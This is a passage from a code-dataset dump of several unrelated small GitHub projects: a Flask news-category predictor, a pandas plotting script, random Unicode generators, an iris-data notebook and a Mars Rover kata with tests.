ax.text(a+13.5,index+0.1,str(round(a,2))+'%',color='black',ha=\"center\")\n index+=1\n ax.set_xticks(xticks)\n plt.tight_layout()\n fig=ax.get_figure()\n \n img=io.BytesIO()\n fig.savefig(img,format='png',transparent=True)\n img.seek(0)\n graph_url=base64.b64encode(img.getvalue()).decode()\n graph='data:image/png;base64,{}'.format(graph_url)\n\n if (plotprob[0]-plotprob[1])<5 and (plotprob[1]-plotprob[2])<5 and (plotprob[2]-plotprob[3])<5 and (plotprob[3]-plotprob[4])<5:\n statement=\"We must say this one is too hard to predict. The words are just too random. Here's the visualization for you: \"\n elif (plotprob[0]-plotprob[1])<5 and (plotprob[1]-plotprob[2])<5:\n statement=\"Though it seems we're likely wrong about the prediction. Worry not, we have the tendencies for you: \"\n elif (plotprob[0]-plotprob[1])<5:\n statement=\"We kind of doubt this prediction result ourselves, but it's basically one or another, it seems: \"\n elif 5<=(plotprob[0]-plotprob[1])<10:\n statement=\"We are on the stance of confidence right here about the prediction. In case we're wrong, we have the probabilities: \"\n elif (plotprob[0]-plotprob[1])>=10:\n statement=\"We are pretty sure about this prediction. 
Here's why: \"\n\n x=mysql.connection.cursor()\n x.execute('insert into news (headline,description,prediction) values (%s,%s,%s)',(str(request.form['head']),str(request.form['desc']),kategori))\n mysql.connection.commit()\n\n predictData=[kategori,statement,graph]\n return render_template('predict.htm',prediction=predictData)\n\[email protected]('/NotFound')\ndef notFound():\n return render_template('error.htm')\n\[email protected](404)\ndef notFound404(error):\n return render_template('error.htm')\n\nif __name__=='__main__':\n model=jb.load('modelComplement')\n app.run(debug=True)" }, { "alpha_fraction": 0.6704155206680298, "alphanum_fraction": 0.6847860217094421, "avg_line_length": 41.68000030517578, "blob_id": "bb76163209492a1945d9bb368d7b76eeaf13824e", "content_id": "adfab30fe2ca68c0676c100841ad024a9e5536db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3201, "license_type": "no_license", "max_line_length": 127, "num_lines": 75, "path": "/newsplot.py", "repo_name": "agammsantos/Final-Project-JCDS", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\ndata=pd.read_json('News_Category_Dataset_v2.json',lines=True)\nprint(data[data['headline'].isnull()==True])\nprint(data[data['short_description'].isnull()==True])\n# print(data.columns.values)\n# print(data['category'].value_counts())\n\ndata.category = data.category.map(lambda x: \"ARTS & CULTURE\" if x == \"ARTS\" or x == \"CULTURE & ARTS\" else x)\ndata.category = data.category.map(lambda x: \"WEIRD NEWS & COMEDY\" if x == \"COMEDY\" or x == \"WEIRD NEWS\" else x)\ndata.category = data.category.map(lambda x: \"BUSINESS\" if x == \"MONEY\" else x)\ndata.category = data.category.map(lambda x: \"EDUCATION\" if x == \"COLLEGE\" else x)\ndata.category = data.category.map(lambda x: \"HOME & LIVING\" if x == \"HEALTHY LIVING\" or x == \"WELLNESS\" or x == \"FIFTY\" else x)\ndata.category = data.category.map(lambda x: \"PARENTS\" if x == \"PARENTING\" else x)\ndata.category = data.category.map(lambda x: \"IMPACT\" if x == \"GOOD NEWS\" else x)\ndata.category = data.category.map(lambda x: \"ENVIRONMENT\" if x == \"GREEN\" else x)\ndata.category = data.category.map(lambda x: \"STYLE & BEAUTY\" if x == \"STYLE\" else x)\ndata.category = data.category.map(lambda x: \"FOOD & DRINK\" if x == \"TASTE\" else x)\ndata.category = data.category.map(lambda x: \"SCIENCE & TECH\" if x == \"SCIENCE\" or x == \"TECH\" else x)\ndata.category = data.category.map(lambda x: \"WORLD NEWS\" if x == \"THE WORLDPOST\" or x == \"WORLDPOST\" else x)\n# print(data['features'][data['category']=='COMEDY'])\n# print(data['features'][data['category']=='WEIRD NEWS'])\n# data=data.drop(data[data['category']=='GOOD NEWS'].index.values)\n# data=data.drop(data[data['category']=='IMPACT'].index.values)\n\ndata['features']=data['headline']+' '+data['short_description']\ndata['features']=data['features'].apply(lambda x: x.lower())\ndata['hwlen'] = data['headline'].apply(lambda x: x.split(' ')).apply(len)\ndata['dwlen'] = data['short_description'].apply(lambda x: x.split(' ')).apply(len)\ndata['fwlen'] = data['features'].apply(lambda x: x.split(' ')).apply(len)\n# print(data['features'].head())\n# print(data['fwlen'].max())\n\n\ngrouped=data.groupby('category')\nprint(grouped.ngroups)\nprint(grouped.describe())\n\nplt.figure('Histogram 1',figsize=(25,25))\nplt.suptitle('Histogram Jumlah Kata Headline Per Kategori',size=25)\ni=1\nfor group in 
grouped:\n plt.subplot(5,5,i)\n plt.title(group[0])\n plt.hist(group[1]['hwlen'],bins='auto')\n i+=1 \nplt.subplots_adjust(hspace=.6,wspace=.4)\nplt.savefig('./histogramh.png',format='png')\n\nplt.figure('Histogram 2',figsize=(25,25))\nplt.suptitle('Histogram Jumlah Kata Deskripsi Per Kategori',size=25)\ni=1\nfor group in grouped:\n plt.subplot(5,5,i)\n plt.title(group[0])\n plt.hist(group[1]['dwlen'],bins='auto')\n i+=1 \nplt.subplots_adjust(hspace=.6,wspace=.4)\nplt.savefig('./histogramd.png',format='png')\n\nplt.figure('Histogram 3',figsize=(25,25))\nplt.suptitle('Histogram Jumlah Kata Features Per Kategori',size=25)\ni=1\nfor group in grouped:\n plt.subplot(5,5,i)\n plt.title(group[0])\n plt.hist(group[1]['fwlen'],bins='auto')\n i+=1 \nplt.subplots_adjust(hspace=.6,wspace=.4)\nplt.savefig('./histogramf.png',format='png')\n\nplt.show()\n" } ]
4
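The Final-Project-JCDS record above trains three scikit-learn pipelines (MultinomialNB, ComplementNB, and SGDClassifier) behind the same CountVectorizer front end, then serializes the ComplementNB pipeline for the Flask app. A minimal sketch of that CountVectorizer + ComplementNB pattern on a tiny in-memory corpus — the toy texts and labels below are illustrative assumptions, not rows from the News Category dataset:
```
# Sketch of the CountVectorizer + ComplementNB pipeline pattern used in
# newsmodel.py; the corpus below is made up for illustration.
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.naive_bayes import ComplementNB
from sklearn.pipeline import Pipeline

texts = [
    "stocks rally as markets rebound",
    "team wins the championship final",
    "new smartphone model released this week",
    "lawmakers debate the new election bill",
]
labels = ["BUSINESS", "SPORTS", "SCIENCE & TECH", "POLITICS"]

pipeline = Pipeline([
    ("cv", CountVectorizer(stop_words="english")),  # bag-of-words features
    ("classifier", ComplementNB()),                 # variant of NB that handles class imbalance well
])
pipeline.fit(texts, labels)

# predict_proba is what lets newsflask.py rank the top-5 categories
print(pipeline.predict(["markets fall after the election"]))
print(pipeline.predict_proba(["markets fall after the election"]).round(3))
```
ComplementNB is a reasonable default when category counts are imbalanced, as they are after the category merging above — presumably why the repo ships `modelComplement` rather than the plain MultinomialNB model.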
logs3/random_utf8
https://github.com/logs3/random_utf8
8bea68036a4bc08711a4e811aaee251ff827627e
86c1bf8c8868db74c14ada1018bdc7cefb00898e
1cb88d3980c7c1beb728bb8cf389f112a32ffd72
refs/heads/master
2022-12-04T00:05:15.790749
2020-08-22T19:12:14
2020-08-22T19:12:14
263,857,433
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.668639063835144, "alphanum_fraction": 0.7100591659545898, "avg_line_length": 32.79999923706055, "blob_id": "f7b8351862197bcbd16035cadad6e52fc14d6fe0", "content_id": "78992f846adf681540fc5df0a79a9bce404edf5c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 169, "license_type": "no_license", "max_line_length": 88, "num_lines": 5, "path": "/chinese.py", "repo_name": "logs3/random_utf8", "src_encoding": "UTF-8", "text": "import random\n\ndef random_chinese(length):\n random_unicodes = [chr(random.randrange(0x4E00, 0x9FBF)) for _ in range(0, length)] \n return u\"\".join(random_unicodes)\n" }, { "alpha_fraction": 0.6608186960220337, "alphanum_fraction": 0.719298243522644, "avg_line_length": 33.20000076293945, "blob_id": "2c07a0f96d349e756bb840e8c66bbf35c57662a5", "content_id": "43c1ac828bd54d64fb8ea9ce6a76cb439c5fece4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 171, "license_type": "no_license", "max_line_length": 89, "num_lines": 5, "path": "/emoji/emoticon.py", "repo_name": "logs3/random_utf8", "src_encoding": "UTF-8", "text": "import random\n\ndef random_emoticon(length):\n random_unicodes = [chr(random.randrange(0x1F601, 0x1F64F)) for _ in range(0, length)]\n return u\"\".join(random_unicodes)\n" }, { "alpha_fraction": 0.6627218723297119, "alphanum_fraction": 0.7218934893608093, "avg_line_length": 33, "blob_id": "d4dfcb82297bf36e7c2fcd19aa0ea94788dbfd52", "content_id": "a3e45c9197acc60afd99fff1c52b69653ec7f77f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 169, "license_type": "no_license", "max_line_length": 89, "num_lines": 5, "path": "/emoji/symbols.py", "repo_name": "logs3/random_utf8", "src_encoding": "UTF-8", "text": "import random\n\ndef random_symbols(length):\n random_unicodes = [chr(random.randrange(0x1F680, 0x1F6C0)) for _ in range(0, length)]\n return u\"\".join(random_unicodes)" }, { "alpha_fraction": 0.6566265225410461, "alphanum_fraction": 0.7108433842658997, "avg_line_length": 32.20000076293945, "blob_id": "dafeaaab1d839c86416f10607e9f9d57c820cad9", "content_id": "4c8aabedf4dedb80ffd8398e94536953d4f898ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 166, "license_type": "no_license", "max_line_length": 87, "num_lines": 5, "path": "/error.py", "repo_name": "logs3/random_utf8", "src_encoding": "UTF-8", "text": "import random\n\ndef random_error(length):\n random_unicodes = [chr(random.randrange(0x1041, 0x10aa)) for _ in range(0, length)]\n return u\"\".join(random_unicodes)\n" }, { "alpha_fraction": 0.6607142686843872, "alphanum_fraction": 0.7202380895614624, "avg_line_length": 32.79999923706055, "blob_id": "f75bb4146cb4477b982463f82ac9dd7b695efc40", "content_id": "d830249e58d165d6d7a315f96fbe95d2d4a64163", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 168, "license_type": "no_license", "max_line_length": 87, "num_lines": 5, "path": "/emoji/dingbats.py", "repo_name": "logs3/random_utf8", "src_encoding": "UTF-8", "text": "import random\n\ndef random_dingbats(length):\n random_unicodes = [chr(random.randrange(0x2702, 0x27B0)) for _ in range(0, length)]\n return u\"\".join(random_unicodes)" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.7251461744308472, "avg_line_length": 33.400001525878906, "blob_id": 
"887641f620d3fcaf07fb16a02d1b8c074c068427", "content_id": "75ece9c578d188dcc6e71bde46c6b48f3e0940fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 171, "license_type": "no_license", "max_line_length": 88, "num_lines": 5, "path": "/emoji/characters.py", "repo_name": "logs3/random_utf8", "src_encoding": "UTF-8", "text": "import random\n\ndef random_characters(length):\n random_unicodes = [chr(random.randrange(0x24C2, 0x1F251)) for _ in range(0, length)]\n return u\"\".join(random_unicodes)" } ]
6
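Each module in the random_utf8 record above repeats the same one-liner with a different hard-coded code-point range. A hedged generalization of that pattern — the function name and the ranges dictionary are assumptions, not part of the repo:
```
import random

# Parameterized version of the repo's per-range helpers: pass the
# code-point range instead of hard-coding it in each module.
def random_utf8(length, start, end):
    return "".join(chr(random.randrange(start, end)) for _ in range(length))

# Ranges copied from the modules above (the dict itself is illustrative).
RANGES = {
    "chinese": (0x4E00, 0x9FBF),     # as in chinese.py
    "emoticon": (0x1F601, 0x1F64F),  # as in emoji/emoticon.py
    "dingbats": (0x2702, 0x27B0),    # as in emoji/dingbats.py
}

for name, (lo, hi) in RANGES.items():
    print(name, random_utf8(5, lo, hi))
```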
martinkioko/machine-learning
https://github.com/martinkioko/machine-learning
3733e164f96eae676d84b44644c09c87e9501897
076c2e3749f9aeea024e3e992dc8322379aec253
1761155778bd82b97390b119a64c5a23957e2b24
refs/heads/master
2020-12-15T14:28:46.306599
2020-01-20T15:47:13
2020-01-20T15:47:13
235,135,650
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7121211886405945, "alphanum_fraction": 0.7257575988769531, "avg_line_length": 13.461538314819336, "blob_id": "5be55795ecc3e0cadab35d5c26deb3a0f989f25f", "content_id": "015d11a4f1bcc4ba0b7cb87372b29287a38a59f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1320, "license_type": "no_license", "max_line_length": 84, "num_lines": 91, "path": "/ml steps.py", "repo_name": "martinkioko/machine-learning", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd \nfrom pandas.plotting import scatter_matrix\nimport matplotlib.pyplot as plt\nfrom sklearn import model_selection\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.svm import SVC\n\n\n# In[2]:\n\n\nurl = \"https://raw.githubusercontent.com/jbrownlee/Datasets/master/iris.csv\"\nnames = ['sepal-length', 'sepal-width', 'petal-length', 'petal-width', 'class']\ndataset = pd.read_csv(url, names=names)\n\n\n# In[3]:\n\n\ndataset.describe()\n\n\n# In[4]:\n\n\ndataset.groupby('class').size()\n\n\n# In[5]:\n\n\nurl = \"https://raw.githubusercontent.com/jbrownlee/Datasets/master/iris.csv\"\n\n\n# In[6]:\n\n\ndataset.head()\n\n\n# In[7]:\n\n\ndataset.shape\n\n\n# In[8]:\n\n\ndataset.describe()\n\n\n# In[9]:\n\n\ndataset.info()\n\n\n# In[10]:\n\n\ndataset.groupby('class').size()\n\n\n# In[12]:\n\n\ndataset['class'].value_counts()\n\n\n# In[15]:\n\n\ndataset.plot(kind='box') #, subplots=True, layout=(2,2), sharex=False, sharey=False\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n" }, { "alpha_fraction": 0.8571428656578064, "alphanum_fraction": 0.8571428656578064, "avg_line_length": 41, "blob_id": "bf13604f23857050a4438189fbbadaa05fef3064", "content_id": "3255ade79e7d084919de3028b91450f1b38b60a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 42, "license_type": "no_license", "max_line_length": 41, "num_lines": 1, "path": "/README.md", "repo_name": "martinkioko/machine-learning", "src_encoding": "UTF-8", "text": "# supervised machine-learning predictions\n" } ]
2
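The `ml steps.py` record above imports `model_selection` and several classifiers but stops after exploring the iris dataset. A hedged sketch of the usual next step — the 80/20 split, the seed, and the choice of KNeighborsClassifier are assumptions, not taken from the notebook:
```
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.neighbors import KNeighborsClassifier
from sklearn.metrics import accuracy_score

# Same dataset URL and column names as in "ml steps.py"
url = "https://raw.githubusercontent.com/jbrownlee/Datasets/master/iris.csv"
names = ['sepal-length', 'sepal-width', 'petal-length', 'petal-width', 'class']
dataset = pd.read_csv(url, names=names)

X = dataset.drop(columns='class')
y = dataset['class']
X_train, X_test, y_train, y_test = train_test_split(
    X, y, test_size=0.2, random_state=1)  # assumed split, not from the file

model = KNeighborsClassifier()
model.fit(X_train, y_train)
print(accuracy_score(y_test, model.predict(X_test)))  # held-out accuracy
```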
alka2/mars-rover
https://github.com/alka2/mars-rover
6863bd0006b71b646118897651f30d025e16da17
763bf03e9fa80b0d0625fa2a1f1d02ab2bcf0ff1
edbe875f0902d99ad3a7379be77f4cbdf61122fc
refs/heads/master
2022-04-13T09:34:29.050182
2020-04-15T04:32:35
2020-04-15T04:32:35
255,803,217
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7335995435714722, "alphanum_fraction": 0.7424415349960327, "avg_line_length": 49.08571243286133, "blob_id": "af76f103639a6d7a699f2449e2efbe808eaad609", "content_id": "d9a75b4c084009e4016755212d9936e542835848", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3506, "license_type": "no_license", "max_line_length": 578, "num_lines": 70, "path": "/README.md", "repo_name": "alka2/mars-rover", "src_encoding": "UTF-8", "text": "## Mars Rover\n\nA squad of robotic rovers are to be landed by NASA on a plateau on Mars.\n\nThis plateau, which is curiously rectangular, must be navigated by the rovers so that their on board cameras can get a complete view of the surrounding terrain to send back to Earth.\n\nA rover's position is represented by a combination of an x and y co-ordinates and a letter representing one of the four cardinal compass points. The plateau is divided up into a grid to simplify navigation. An example position might be 0, 0, N, which means the rover is in the bottom left corner and facing North.\n\nIn order to control a rover, NASA sends a simple string of letters. The possible letters are 'L', 'R' and 'M'. 'L' and 'R' makes the rover spin 90 degrees left or right respectively, without moving from its current spot.\n\n'M' means move forward one grid point, and maintain the same heading.\n\nAssume that the square directly North from (x, y) is (x, y+1).\n\nInput:\n\nConfiguration Input: The first line of input is the upper-right coordinates of the plateau, the lower-left coordinates are assumed to be 0,0.\n\nPer Rover Input:\n\nInput 1: Landing co-ordinates for the named Rover. The position is made up of two integers and a letter separated by spaces, corresponding to the x and y co-ordinates and the rover's orientation.\n\nInput 2: Navigation instructions for the named rover. 
i.e. a string containing ('L', 'R', 'M').\n\n### How to run the app\nTo run the application you need to have **Python 3.7+**.\n\n#### Test input from command line:\n```\n$ python mars_rover.py \"Plateau:5 5\nRover1 Landing:1 2 N\nRover1 Instructions:LMLMLMLMM\nRover2 Landing:3 3 E\nRover2 Instructions:MMRMMRMRRM\"\n```\n\n#### Test input from a file:\n```\n$ python mars_rover.py input.txt\n```\n\n#### Expected Output:\n```\nRover1:1 3 N\nRover2:5 1 E\n```\n\n#### Unit Test:\n```\n$ python mars_rover_unittest.py\n```\n### Assumptions:\n\n- ``Rovers`` can land in the same grid, and they can have different instructions.\n- One Rover moves at a time: it finishes its instructions, and then the next Rover starts its instructions.\n- Collision is acceptable, which means that if Rover1 is in grid 1,3, Rover2 can come to the same grid or pass through that grid.\n\n### Other possible scenarios:\n\n- ``Rovers`` cannot land in the same grid.\n- ``Rovers`` can move at the same time.\n- Each ``Rover`` moves once at a time, and then the next Rover moves.\n- Apply one instruction at a time for each Rover (then apply one instruction for the next Rover).\n- A ``Rover`` cannot end at a grid that already has a ``Rover`` in it.\n \n#### Changes that are needed for the above scenarios:\n\n- If collision is **acceptable**, there won't be any changes in the main ``Rover`` class functions; however, the ``apply_instructions`` function needs to be updated in order to apply instructions in the desired format.\n- If collision is **NOT acceptable**, the ``Rover`` class needs to change, especially the ``move`` function: a check must be added for each move to avoid collision (if moves are simultaneous, each move needs to be checked to make sure that there is no collision), and in some scenarios a Rover can be blocked completely if there is already another Rover in a grid that the other Rover wants to move to (for example, if a ``Rover`` cannot end at the same grid, the last ``move`` needs to be checked). There also needs to be a change in ``apply_instructions``, as above. 
\n- If ``Rovers`` cannot land at the same spot, then there needs to be a check in ``set_landing`` method in the ``Rover`` class.\n" }, { "alpha_fraction": 0.5969141721725464, "alphanum_fraction": 0.6239151358604431, "avg_line_length": 41.90345001220703, "blob_id": "48f9f7547948bd23e38b79c93d036f0b3956af73", "content_id": "c80354fd7b35832220430310e4e8b8d38818c09f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6222, "license_type": "no_license", "max_line_length": 85, "num_lines": 145, "path": "/mars_rover_unittest.py", "repo_name": "alka2/mars-rover", "src_encoding": "UTF-8", "text": "\nimport unittest\n\nimport mars_rover\n\n\nclass TestPlateau(unittest.TestCase):\n\n def setUp(self):\n self.plateau = mars_rover.Plateau()\n\n def test_invalid_get_coordinates(self):\n self.plateau.set_upper_coordinates('7 7')\n self.assertNotEqual(self.plateau.get_coordinates(), [0, 0, 5, 5])\n\n def test_coordinates_input_not_equal_to_two(self):\n self.assertRaises(ValueError, self.plateau.set_upper_coordinates, '5 5 3')\n\n def test_coordinates_less_than_zero(self):\n self.assertRaises(ValueError, self.plateau.set_upper_coordinates, '-1 -1')\n\n def test_coordinates_not_integer(self):\n self.assertRaises(ValueError, self.plateau.set_upper_coordinates, 'S a')\n\n def test_valid_coordinates(self):\n self.plateau.set_upper_coordinates('6 6')\n self.assertEqual(self.plateau.get_coordinates(), [0, 0, 6, 6])\n\n def test_invalid_coordinates(self):\n self.assertRaises(ValueError, self.plateau.set_upper_coordinates, '-1 -1')\n\n\nclass TestRover(unittest.TestCase):\n\n def setUp(self):\n self.rover = mars_rover.Rover()\n self.rover.set_plateau_coordinates([0, 0, 5, 5])\n\n def test_valid_landing(self):\n self.rover.set_landing('1 2 N')\n self.assertEqual(self.rover.get_landing(), [1, 2, 'N'])\n\n def test_invalid_landing_from_file(self):\n self.assertRaises(ValueError, self.rover.set_landing, '5 5')\n\n def test_landing_input_not_equal_to_three(self):\n self.assertRaises(ValueError, self.rover.set_landing, '1 N')\n\n def test_landing_coordinates_not_integer(self):\n self.assertRaises(ValueError, self.rover.set_landing, '1 W N')\n\n def test_landing_not_valid_orientation(self):\n self.assertRaises(ValueError, self.rover.set_landing, '1 2 Q')\n\n def test_landing_x_coordinates_out_of_plateau(self):\n self.assertRaises(ValueError, self.rover.set_landing, '6 2 N')\n\n def test_landing_y_coordinates_out_of_plateau(self):\n self.assertRaises(ValueError, self.rover.set_landing, '1 6 N')\n\n def test_valid_instruction(self):\n self.rover.set_instructions('LMLMLMLMM')\n self.assertEqual(self.rover.get_instruction(), 'LMLMLMLMM')\n\n def test_invalid_instruction_control(self):\n self.assertRaises(ValueError, self.rover.set_instructions, 'LMLMLMLMQ')\n\n def test_valid_navigation(self):\n self.assertEqual(self.rover._new_orientation('N', 'L'), 'W')\n self.assertEqual(self.rover._new_orientation('N', 'R'), 'E')\n self.assertEqual(self.rover._new_orientation('W', 'L'), 'S')\n self.assertEqual(self.rover._new_orientation('W', 'R'), 'N')\n self.assertEqual(self.rover._new_orientation('S', 'L'), 'E')\n self.assertEqual(self.rover._new_orientation('S', 'R'), 'W')\n self.assertEqual(self.rover._new_orientation('E', 'L'), 'N')\n self.assertEqual(self.rover._new_orientation('E', 'R'), 'S')\n\n def test_invalid_navigation(self):\n self.assertNotEqual(self.rover._new_orientation('N', 'L'), 'N')\n self.assertNotEqual(self.rover._new_orientation('N', 'R'), 'S')\n 
self.assertNotEqual(self.rover._new_orientation('W', 'L'), 'W')\n self.assertNotEqual(self.rover._new_orientation('W', 'R'), 'E')\n self.assertNotEqual(self.rover._new_orientation('S', 'L'), 'N')\n self.assertNotEqual(self.rover._new_orientation('S', 'R'), 'S')\n self.assertNotEqual(self.rover._new_orientation('E', 'L'), 'W')\n self.assertNotEqual(self.rover._new_orientation('E', 'R'), 'E')\n\n def test_navigation_return_type(self):\n self.assertIsInstance(self.rover._new_orientation('N', 'L'), str)\n\n def test_valid_move(self):\n self.assertEqual(self.rover._move('N', 1, 2), (1, 3))\n self.assertEqual(self.rover._move('N', 1, 5), (1, 5))\n self.assertEqual(self.rover._move('S', 1, 2), (1, 1))\n self.assertEqual(self.rover._move('S', 1, 0), (1, 0))\n self.assertEqual(self.rover._move('E', 1, 2), (2, 2))\n self.assertEqual(self.rover._move('E', 5, 1), (5, 1))\n self.assertEqual(self.rover._move('W', 1, 2), (0, 2))\n self.assertEqual(self.rover._move('W', 0, 2), (0, 2))\n\n def test_invalid_move(self):\n self.assertNotEqual(self.rover._move('N', 1, 2), (1, 2))\n self.assertNotEqual(self.rover._move('N', 1, 5), (1, 6))\n self.assertNotEqual(self.rover._move('S', 1, 2), (1, 2))\n self.assertNotEqual(self.rover._move('S', 1, 0), (1, 1))\n self.assertNotEqual(self.rover._move('E', 1, 2), (1, 2))\n self.assertNotEqual(self.rover._move('E', 5, 1), (4, 1))\n self.assertNotEqual(self.rover._move('W', 1, 2), (1, 2))\n self.assertNotEqual(self.rover._move('W', 0, 2), (1, 2))\n\n def test_apply_instruction(self):\n self.rover.set_landing('1 2 N')\n self.rover.set_instructions('LMLMLMLMM')\n self.assertEqual(self.rover.apply_instructions(), (1, 3, 'N'))\n\n\nclass MarsRover(unittest.TestCase):\n\n def test_valid_result_from_problem(self):\n input_data = ['MMRMMRMRRM', '3 3 E', 'LMLMLMLMM', '1 2 N', '5 5']\n expected_output = ['Rover1:1 3 N', 'Rover2:5 1 E']\n self.assertEqual(mars_rover.run_mars_rover(input_data), expected_output)\n\n def test_invalid_result(self):\n input_data = ['MMRMMRMRRM', '3 3 E', 'LMLMLMLMM', '1 2 N', '5 5']\n unexpected_output = ['Rover1:1 2 N', 'Rover2:5 0 E']\n self.assertNotEqual(mars_rover.run_mars_rover(input_data), unexpected_output)\n\n def test_valid_case_1(self):\n input_data = ['M', '3 3 E', 'L', '1 2 N', '5 5']\n expected_output = ['Rover1:1 2 W', 'Rover2:4 3 E']\n self.assertEqual(mars_rover.run_mars_rover(input_data), expected_output)\n\n def test_valid_case_2(self):\n input_data = ['MR', '3 3 E', 'LM', '1 2 N', '5 5']\n expected_output = ['Rover1:0 2 W', 'Rover2:4 3 S']\n self.assertEqual(mars_rover.run_mars_rover(input_data), expected_output)\n\n def test_valid_case_3(self):\n input_data = ['LR', '3 3 N', 'RL', '1 2 S', '5 5']\n expected_output = ['Rover1:1 2 S', 'Rover2:3 3 N']\n self.assertEqual(mars_rover.run_mars_rover(input_data), expected_output)\n\n\nif __name__ == '__main__':\n unittest.main()\n" }, { "alpha_fraction": 0.616111695766449, "alphanum_fraction": 0.6207075715065002, "avg_line_length": 43.011451721191406, "blob_id": "656e075317d1fb589ce9eda148349c8bbbc0a25c", "content_id": "e165f53188bf12ab0546eced1cab12716f21870d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11532, "license_type": "no_license", "max_line_length": 120, "num_lines": 262, "path": "/mars_rover.py", "repo_name": "alka2/mars-rover", "src_encoding": "UTF-8", "text": "\nimport sys\nimport os\n\n\nclass Plateau:\n \"\"\"\n class to set the Plateau object coordinates\n \"\"\"\n def __init__(self):\n \"\"\"\n initialize 
variables\n \"\"\"\n self.__bottom_left_x = 0\n self.__bottom_left_y = 0\n self.__upper_right_x = None\n self.__upper_right_y = None\n\n def set_upper_coordinates(self, upper_coordinates):\n \"\"\"\n function to set Plateau upper right coordinates\n :param upper_coordinates: Plateau coordinates from input\n \"\"\"\n try:\n upper_coordinates = upper_coordinates.strip().split(' ')\n\n # check to make sure user entered only x and y coordinates\n if len(upper_coordinates) != 2:\n raise ValueError\n self.__upper_right_x = int(upper_coordinates[0])\n self.__upper_right_y = int(upper_coordinates[1])\n\n # check upper right coordinates to make sure we have a proper Plateau\n if self.__upper_right_x < 0 or self.__upper_right_y < 0:\n raise ValueError\n\n except ValueError: # catch exception if user didn't enter integers for coordinates and only two\n raise ValueError('You must enter x and y for Plateau upper-right coordinates e.g. 5 5. Please try again!\\n')\n\n def get_coordinates(self) -> list:\n \"\"\"\n function to return Plateau coordinates to be used in Rover object\n :return: array of Plateau coordinates -> [bottom left x, bottom left y, upper right x, upper right y]\n \"\"\"\n return [self.__bottom_left_x, self.__bottom_left_y, self.__upper_right_x, self.__upper_right_y]\n\n\nclass Rover:\n \"\"\"\n class to set Rover object -> landing, instructions and apply instructions to the Rover on the Plateau\n \"\"\"\n def __init__(self):\n \"\"\"\n initialize variables\n \"\"\"\n self.__orientations = ['N', 'E', 'S', 'W'] # allowed orientation\n self.__controls = ['L', 'R', 'M'] # allowed instructions\n self.__plateau_bottom_left_x = None\n self.__plateau_bottom_left_y = None\n self.__plateau_upper_right_x = None\n self.__plateau_upper_right_y = None\n self.__rover_x = None\n self.__rover_y = None\n self.__rover_orientation = None\n self.__rover_instruction = None\n\n def set_plateau_coordinates(self, coordinates):\n \"\"\"\n function to set Plateau coordinates to Rover object\n :param coordinates: coordinates from Plateau objects\n \"\"\"\n self.__plateau_bottom_left_x = coordinates[0]\n self.__plateau_bottom_left_y = coordinates[1]\n self.__plateau_upper_right_x = coordinates[2]\n self.__plateau_upper_right_y = coordinates[3]\n\n def set_landing(self, landing):\n \"\"\"\n function to set the Rover landing coordinates and its orientation\n :param landing: Rover landing coordinates and orientation from input\n \"\"\"\n try:\n landing = landing.strip().split(' ')\n\n # check to make sure user entered x and y coordinates and also orientation\n if len(landing) != 3:\n raise ValueError\n\n self.__rover_x = int(landing[0])\n self.__rover_y = int(landing[1])\n self.__rover_orientation = landing[2].upper()\n\n # check the orientation to see if it is a allowed orientation\n if self.__rover_orientation not in self.__orientations:\n raise ValueError\n\n # check the Rover landing x coordinates to see if it falls into the Plateau x coordinates\n if not self.__plateau_bottom_left_x <= self.__rover_x <= self.__plateau_upper_right_x:\n raise ValueError\n\n # check the Rover landing y coordinates to see if it falls into the Plateau y coordinates\n if not self.__plateau_bottom_left_y <= self.__rover_y <= self.__plateau_upper_right_y:\n raise ValueError\n except ValueError: # capture exception if user didn't enter right information for landing\n raise ValueError(\n 'You must enter Rover landing coordinates and orientation. 
coordinates must fall into Plateau ' +\n 'coordinates and orientation can be [\"N\", \"E\", \"S\", \"W\"]. N= North, E=East, S=South, W=West. ' +\n 'e.g. 1 2 N for Plateau (5,5) and North facing. Please try again!\\n'\n )\n\n def get_landing(self) -> list:\n \"\"\"\n function to get the Rover landing information\n :return: array of landing info -> [rover x coordinate, rover y coordinate, rover orientation]\n \"\"\"\n return [self.__rover_x, self.__rover_y, self.__rover_orientation]\n\n def set_instructions(self, instruction):\n \"\"\"\n function to set the instructions that needs to be applied to the Rover\n :param instruction: Rover instruction from input\n \"\"\"\n try:\n self.__rover_instruction = instruction.strip().upper()\n\n # check instructions to make sure they are valid instructions\n for instruction in self.__rover_instruction:\n if instruction not in self.__controls:\n raise ValueError\n except ValueError: # capture exception if user didn't enter right information for the instruction\n raise ValueError(\n 'Navigation instructions can be in 